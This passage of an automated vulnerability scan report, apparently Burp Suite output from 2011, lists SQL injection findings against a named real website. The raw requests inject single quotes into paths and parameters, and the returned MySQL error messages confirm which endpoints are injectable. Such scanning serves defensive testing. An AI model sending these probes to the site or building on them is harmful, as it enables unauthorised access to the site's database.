Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:35:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:35:41 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /columns-blogs/under-way?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:35:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:35:43 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.157. http://www.soundingsonline.com/component/chronocontact/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/component/chronocontact/

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /component'/chronocontact/ HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:52:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:52:52 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /component''/chronocontact/ HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:52:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:52:52 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.158. http://www.soundingsonline.com/component/chronocontact/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/component/chronocontact/

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /component/chronocontact'/ HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:52:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:52:53 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /component/chronocontact''/ HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:52:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:52:54 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.159. http://www.soundingsonline.com/component/chronocontact/ [chronoformname parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/component/chronocontact/

Issue detail

The chronoformname parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the chronoformname parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /component/chronocontact/?chronoformname=PSPage' HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:52:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:52:39 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/component/chronocontact/?chronoformname=PSPage'' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /component/chronocontact/?chronoformname=PSPage'' HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:52:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:52:39 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.160. http://www.soundingsonline.com/component/chronocontact/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/component/chronocontact/

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /component/chronocontact/?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:52:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:52:45 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /component/chronocontact/?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:52:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:52:46 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.161. http://www.soundingsonline.com/component/content/article/237622 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/component/content/article/237622

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /component/content'/article/237622 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:53:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:53:01 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /component/content''/article/237622 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:53:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:53:02 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.162. http://www.soundingsonline.com/component/content/article/237622 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/component/content/article/237622

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /component/content/article'/237622 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:53:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:53:05 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /component/content/article''/237622 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:53:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:53:06 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.163. http://www.soundingsonline.com/component/content/article/237622 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/component/content/article/237622

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /component/content/article/237622' HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:53:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:53:10 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/component/content/article/237622'' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /component/content/article/237622'' HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:53:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:53:11 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.164. http://www.soundingsonline.com/component/content/article/237622 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/component/content/article/237622

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /component/content/article/237622?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:52:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:52:51 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /component/content/article/237622?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:52:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
